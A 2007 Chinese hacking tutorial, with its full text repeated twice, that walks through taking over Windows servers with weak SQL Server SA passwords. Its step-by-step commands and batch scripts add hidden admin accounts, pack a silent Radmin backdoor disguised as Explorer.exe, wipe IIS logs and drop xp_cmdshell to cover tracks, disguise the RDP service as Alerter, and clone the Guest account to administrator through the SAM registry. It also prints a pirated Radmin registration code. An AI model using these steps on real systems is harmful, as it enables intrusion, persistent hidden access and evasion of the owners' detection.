解析入侵3389的全部流程
更新時(shí)間:2007年01月03日 00:00:00 作者:
這多是本人多年下來(lái)的經(jīng)驗(yàn)。
工具:WINNTAutoAttack自動(dòng)攻擊器(掃漏洞);SQLTOOLS(SA空口令連接器);RAMDIN影子3.0中文版(遠(yuǎn)程控制程序)(RADMIN注冊(cè)碼:
08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隱藏3389服務(wù)及不讓管理發(fā)現(xiàn)自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(開3389端口服務(wù)的);psu.exe(使用被禁止的Guest帳戶要用到的);mstsc.exe(遠(yuǎn)程桌面連接程序)。
一.掃到SA弱口令(自動(dòng)攻擊器)
二.用SQLTOOLS連上去建一個(gè)用戶
net start telnet
開telnet服務(wù)
net user mint mint /add
添加用戶mint密碼為
mint net localgroup administrators mint /add
將帳號(hào)mint升級(jí)為管理員
三.上傳后門程序RAD.EXE(RADMIN服務(wù)端自解壓程序)
制作RAD.EXE過(guò)程:
1、到Radmin安裝目錄下找到AdmDll.dll、 raddrv.dll和r_sever.exe;
2、在本地設(shè)置服務(wù)端(一定要生成);
設(shè)置密碼-->>設(shè)置連接端口(默認(rèn)4489)-->>生成
3、導(dǎo)出注冊(cè)表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的鍵值為1.reg;
4、編寫一個(gè)批處理,并命名為u.bat;
@echo offnet stop r_server
5、寫第二個(gè)批處理,r.bat,內(nèi)容為:
@echo off@Explorer.exe /
uninstall /silence@Explorer.exe /install /
silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /
silence@Explorer.exe /install /silence@regedit /
s 1.reg@net start r_server@del
rad.exe@del 1.reg@del r.bat@del u.bat
6、將AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat壓縮成Rad.RAR壓縮包;
7、將Rad.rar制作成自解壓文件;
選擇Default.sfx的自釋放模塊-->>高級(jí)自釋放選項(xiàng)
-->>常規(guī)
釋放路徑:%systemroot%\\system32
安裝程序:釋放后運(yùn)行:r.bat 釋放前運(yùn)行u.bat
-->>摸式
緘默模式:全部隱藏 覆蓋方式:覆蓋所有文件
-->>確定-->>確定
生成完成。
四.用RADMIN客服端連接
上傳文件到c:\\WINNT(XP是windows):
port.bat(如果是在XP下,這個(gè)要把里面的WINNT改為Windows)
query.exe quser.exe
SC.exe
CleanIISLog.exe.exe
3389.exe
psu.exe
最好再上傳一個(gè)反彈后門RADMIN進(jìn)入TELNET。
運(yùn)行c:\\winnt\\3389.exe,重啟肉雞。
五.重啟后用遠(yuǎn)程桌面遠(yuǎn)程器連上去
這里就有時(shí)會(huì)出現(xiàn)個(gè)問題。
使用3389登陸,發(fā)現(xiàn)登陸用戶已滿,不用怕,我們把他踢出去。
telnet對(duì)方ip,發(fā)現(xiàn)需要 NTLM 身份驗(yàn)證。我們?cè)谧约旱碾娔X里建立一個(gè)帳號(hào)mint密碼為mint身份為管理員。
找到c:\\winnt\\system32\\cmd.exe 建立一個(gè)快捷方式到桌面。修改cmd的快捷方式屬性為允許其他身份登陸。然后運(yùn)行桌面上的cmd.exe的快捷方式。輸入帳號(hào)mint密碼mint,telnet對(duì)方ip,直接可以登陸對(duì)方電腦了。
使用命令:
c:\\query user (查看對(duì)方目前終端登陸狀況。)
運(yùn)行命令:
c:\\logoff 1(踢出去一個(gè)管理者)
再用c:\\query user檢查一便~~(這就是為什么不馬上用1.bat了)
六.連上后..在cmd下運(yùn)行
c:\\winnt\\log . 自己的IP .(擦PP)
c:\\winnet\\1.bat (刪除覆蓋查看當(dāng)前在線用戶文件)
七.打SA空口令補(bǔ)丁
程序-->>Microsoft SQL Server-->>查詢分析器(有放大鏡的)
-->>Windowst身位驗(yàn)證登陸
復(fù)制一下代碼:SELMIS
if exists (select * from dbo.sysobjects where id
= object_id(N\'[dbo].[xp_cmdshell]\')
and OBJECTPROPERTY(id, N\'IsExtendedProc\')
= 1) exec sp_dropextendedproc N\'[dbo].[xp_cmdshell]\'GO
按F5(運(yùn)行),關(guān)了退出SQL Server再用SQL Server身位驗(yàn)證進(jìn)一次,退出(這是為了不留下記錄)。
八.改3389端口和服務(wù)名稱
修改服務(wù)器端的端口設(shè)置,注冊(cè)表有2個(gè)地方需要修改。
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp],PortNumber值,默認(rèn)是3389,選擇10進(jìn)制,修改成所希望的端口,比如1314。
第二個(gè)地方:
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] PortNumber值,默認(rèn)是3389,選擇10進(jìn)制,修改成所希望的端口,比如1314。
要重啟系統(tǒng)才能用新端口連。(不急..改了他的服務(wù)名再重啟系統(tǒng)吧)
導(dǎo)出3389服務(wù)的
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]
的鍵值為mm.reg文件。編輯mm.reg文件,替換TermService為Alerter(錯(cuò)誤警告服務(wù)..別的服務(wù)也行) 。再把第十行的"Description"="(這里是服務(wù)說(shuō)明,改為你所換的服務(wù)說(shuō)明,這里改為通知所選用戶和計(jì)算機(jī)有關(guān)系統(tǒng)管理級(jí)警報(bào)。)"第十一行的"DisplayName"="(這里是服務(wù)名稱,改為你所換的服務(wù)名稱,這里改為Alerter)。保存,再導(dǎo)入注冊(cè)表(這里要先運(yùn)行Services.msc(可在CMD下打這命令)服務(wù)管理器..把Alerter的服務(wù)先停止)。
再在CMD下
CD c:\\winnt\\
system32 copy termsrv.exe service.exe
(這里是復(fù)制termsrv.exe為Alerter服務(wù)文件名差不多的文件)
CD C:\\winnt sc \\\\127.0.0.1 config Alerter binpath=
c:\\winnt\\system32\\service.exe
(這里是從新定向Alerter服務(wù)文件.服務(wù)名一定要區(qū)分大小寫A要大寫)
九.注消后(注消比直接關(guān)要好些)用Radmin重啟肉雞
十.使用被禁用的帳戶[Guest]登陸,刪除自己開始建的帳號(hào)
1.使用psu.exe展開注冊(cè)表到
HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users
用法:[psu -p regedit -i pid]
Pid 的值為在任務(wù)欄空白處點(diǎn)右鍵-->>任務(wù)管理器--->>進(jìn)程中的winlogon.exe后面的數(shù)值就是PID數(shù)值。
如:psu –p regedit –i 157
將Guest克成管理員權(quán)限,克成管理員權(quán)限的方法:
找到HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\Administrator的類型值。
在HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\下找到這個(gè)類型值在復(fù)制數(shù)值名為F的數(shù)值數(shù)劇覆蓋相應(yīng)的Guest的類型值(找的方法一樣)。
導(dǎo)出Guest的配置(也就是導(dǎo)出HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Guest和他相應(yīng)的類型值的數(shù)據(jù)),然后刪除Guest的配置。
2.查看計(jì)算機(jī)管理中帳戶列表,刷新這時(shí)候會(huì)出現(xiàn)錯(cuò)誤[找不到帳戶](跳過(guò)這步也行)。
3.將Guest的配置(二個(gè)REG文件導(dǎo)進(jìn)注冊(cè)表)。
4.修改Guest帳戶密碼,命令行下禁用Guest帳戶[一定是命令行下]。
net user Guest ****
[修改密碼]net user Guest /
active:yesnet user Guest /active:no[命令行下禁用Guest]
5.實(shí)驗(yàn)被禁止的帳戶Guest是否可用。
6.用Guest登陸后刪除自己建的帳號(hào)。
net user mint /del
整個(gè)過(guò)程結(jié)束。
最后最好把RADMIN的服務(wù)也改了,多留個(gè)后門多條路,呵呵。整個(gè)過(guò)程全部結(jié)束,這機(jī)子就真正變成你的肉雞了。
工具:WINNTAutoAttack自動(dòng)攻擊器(掃漏洞);SQLTOOLS(SA空口令連接器);RAMDIN影子3.0中文版(遠(yuǎn)程控制程序)(RADMIN注冊(cè)碼:
08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隱藏3389服務(wù)及不讓管理發(fā)現(xiàn)自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(開3389端口服務(wù)的);psu.exe(使用被禁止的Guest帳戶要用到的);mstsc.exe(遠(yuǎn)程桌面連接程序)。
一.掃到SA弱口令(自動(dòng)攻擊器)
二.用SQLTOOLS連上去建一個(gè)用戶
net start telnet
開telnet服務(wù)
net user mint mint /add
添加用戶mint密碼為
mint net localgroup administrators mint /add
將帳號(hào)mint升級(jí)為管理員
三.上傳后門程序RAD.EXE(RADMIN服務(wù)端自解壓程序)
制作RAD.EXE過(guò)程:
1、到Radmin安裝目錄下找到AdmDll.dll、 raddrv.dll和r_sever.exe;
2、在本地設(shè)置服務(wù)端(一定要生成);
設(shè)置密碼-->>設(shè)置連接端口(默認(rèn)4489)-->>生成
3、導(dǎo)出注冊(cè)表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的鍵值為1.reg;
4、編寫一個(gè)批處理,并命名為u.bat;
@echo offnet stop r_server
5、寫第二個(gè)批處理,r.bat,內(nèi)容為:
@echo off@Explorer.exe /
uninstall /silence@Explorer.exe /install /
silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /
silence@Explorer.exe /install /silence@regedit /
s 1.reg@net start r_server@del
rad.exe@del 1.reg@del r.bat@del u.bat
6、將AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat壓縮成Rad.RAR壓縮包;
7、將Rad.rar制作成自解壓文件;
選擇Default.sfx的自釋放模塊-->>高級(jí)自釋放選項(xiàng)
-->>常規(guī)
釋放路徑:%systemroot%\\system32
安裝程序:釋放后運(yùn)行:r.bat 釋放前運(yùn)行u.bat
-->>摸式
緘默模式:全部隱藏 覆蓋方式:覆蓋所有文件
-->>確定-->>確定
生成完成。
四.用RADMIN客服端連接
上傳文件到c:\\WINNT(XP是windows):
port.bat(如果是在XP下,這個(gè)要把里面的WINNT改為Windows)
query.exe quser.exe
SC.exe
CleanIISLog.exe.exe
3389.exe
psu.exe
最好再上傳一個(gè)反彈后門RADMIN進(jìn)入TELNET。
運(yùn)行c:\\winnt\\3389.exe,重啟肉雞。
五.重啟后用遠(yuǎn)程桌面遠(yuǎn)程器連上去
這里就有時(shí)會(huì)出現(xiàn)個(gè)問題。
使用3389登陸,發(fā)現(xiàn)登陸用戶已滿,不用怕,我們把他踢出去。
telnet對(duì)方ip,發(fā)現(xiàn)需要 NTLM 身份驗(yàn)證。我們?cè)谧约旱碾娔X里建立一個(gè)帳號(hào)mint密碼為mint身份為管理員。
找到c:\\winnt\\system32\\cmd.exe 建立一個(gè)快捷方式到桌面。修改cmd的快捷方式屬性為允許其他身份登陸。然后運(yùn)行桌面上的cmd.exe的快捷方式。輸入帳號(hào)mint密碼mint,telnet對(duì)方ip,直接可以登陸對(duì)方電腦了。
使用命令:
c:\\query user (查看對(duì)方目前終端登陸狀況。)
運(yùn)行命令:
c:\\logoff 1(踢出去一個(gè)管理者)
再用c:\\query user檢查一便~~(這就是為什么不馬上用1.bat了)
六.連上后..在cmd下運(yùn)行
c:\\winnt\\log . 自己的IP .(擦PP)
c:\\winnet\\1.bat (刪除覆蓋查看當(dāng)前在線用戶文件)
七.打SA空口令補(bǔ)丁
程序-->>Microsoft SQL Server-->>查詢分析器(有放大鏡的)
-->>Windowst身位驗(yàn)證登陸
復(fù)制一下代碼:SELMIS
if exists (select * from dbo.sysobjects where id
= object_id(N\'[dbo].[xp_cmdshell]\')
and OBJECTPROPERTY(id, N\'IsExtendedProc\')
= 1) exec sp_dropextendedproc N\'[dbo].[xp_cmdshell]\'GO
按F5(運(yùn)行),關(guān)了退出SQL Server再用SQL Server身位驗(yàn)證進(jìn)一次,退出(這是為了不留下記錄)。
八.改3389端口和服務(wù)名稱
修改服務(wù)器端的端口設(shè)置,注冊(cè)表有2個(gè)地方需要修改。
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp],PortNumber值,默認(rèn)是3389,選擇10進(jìn)制,修改成所希望的端口,比如1314。
第二個(gè)地方:
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] PortNumber值,默認(rèn)是3389,選擇10進(jìn)制,修改成所希望的端口,比如1314。
要重啟系統(tǒng)才能用新端口連。(不急..改了他的服務(wù)名再重啟系統(tǒng)吧)
導(dǎo)出3389服務(wù)的
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]
的鍵值為mm.reg文件。編輯mm.reg文件,替換TermService為Alerter(錯(cuò)誤警告服務(wù)..別的服務(wù)也行) 。再把第十行的"Description"="(這里是服務(wù)說(shuō)明,改為你所換的服務(wù)說(shuō)明,這里改為通知所選用戶和計(jì)算機(jī)有關(guān)系統(tǒng)管理級(jí)警報(bào)。)"第十一行的"DisplayName"="(這里是服務(wù)名稱,改為你所換的服務(wù)名稱,這里改為Alerter)。保存,再導(dǎo)入注冊(cè)表(這里要先運(yùn)行Services.msc(可在CMD下打這命令)服務(wù)管理器..把Alerter的服務(wù)先停止)。
再在CMD下
CD c:\\winnt\\
system32 copy termsrv.exe service.exe
(這里是復(fù)制termsrv.exe為Alerter服務(wù)文件名差不多的文件)
CD C:\\winnt sc \\\\127.0.0.1 config Alerter binpath=
c:\\winnt\\system32\\service.exe
(這里是從新定向Alerter服務(wù)文件.服務(wù)名一定要區(qū)分大小寫A要大寫)
九.注消后(注消比直接關(guān)要好些)用Radmin重啟肉雞
十.使用被禁用的帳戶[Guest]登陸,刪除自己開始建的帳號(hào)
1.使用psu.exe展開注冊(cè)表到
HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users
用法:[psu -p regedit -i pid]
Pid 的值為在任務(wù)欄空白處點(diǎn)右鍵-->>任務(wù)管理器--->>進(jìn)程中的winlogon.exe后面的數(shù)值就是PID數(shù)值。
如:psu –p regedit –i 157
將Guest克成管理員權(quán)限,克成管理員權(quán)限的方法:
找到HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\Administrator的類型值。
在HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\下找到這個(gè)類型值在復(fù)制數(shù)值名為F的數(shù)值數(shù)劇覆蓋相應(yīng)的Guest的類型值(找的方法一樣)。
導(dǎo)出Guest的配置(也就是導(dǎo)出HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Guest和他相應(yīng)的類型值的數(shù)據(jù)),然后刪除Guest的配置。
2.查看計(jì)算機(jī)管理中帳戶列表,刷新這時(shí)候會(huì)出現(xiàn)錯(cuò)誤[找不到帳戶](跳過(guò)這步也行)。
3.將Guest的配置(二個(gè)REG文件導(dǎo)進(jìn)注冊(cè)表)。
4.修改Guest帳戶密碼,命令行下禁用Guest帳戶[一定是命令行下]。
net user Guest ****
[修改密碼]net user Guest /
active:yesnet user Guest /active:no[命令行下禁用Guest]
5.實(shí)驗(yàn)被禁止的帳戶Guest是否可用。
6.用Guest登陸后刪除自己建的帳號(hào)。
net user mint /del
整個(gè)過(guò)程結(jié)束。
最后最好把RADMIN的服務(wù)也改了,多留個(gè)后門多條路,呵呵。整個(gè)過(guò)程全部結(jié)束,這機(jī)子就真正變成你的肉雞了。
相關(guān)文章
通過(guò)關(guān)閉10種服務(wù) 提高Windows XP系統(tǒng)安全性的圖文教程
通過(guò)關(guān)閉10種服務(wù) 提高Windows XP系統(tǒng)安全性的圖文教程...2007-11-11windows 2003服務(wù)器防止海洋木馬的安全設(shè)置
windows 2003服務(wù)器防止海洋木馬的安全設(shè)置...2006-07-07黑客攻防實(shí)戰(zhàn) Windows系統(tǒng)克隆攻擊與防范
下面就由我給大家介紹一些常見的克隆用戶和檢查是否存在克隆用戶及清除的方法。2011-04-04華眾虛擬主機(jī)管理系統(tǒng) 6.0全能破解版+教程
下面介紹一下大致的安裝步驟(強(qiáng)烈申明,本軟件大家下載后作為個(gè)人測(cè)試使用,不要用商業(yè)用途,不然后果自負(fù)2006-07-07Windows2003下安裝Apache+php+jsp+mysql
Windows2003下安裝Apache+php+jsp+mysql...2006-07-07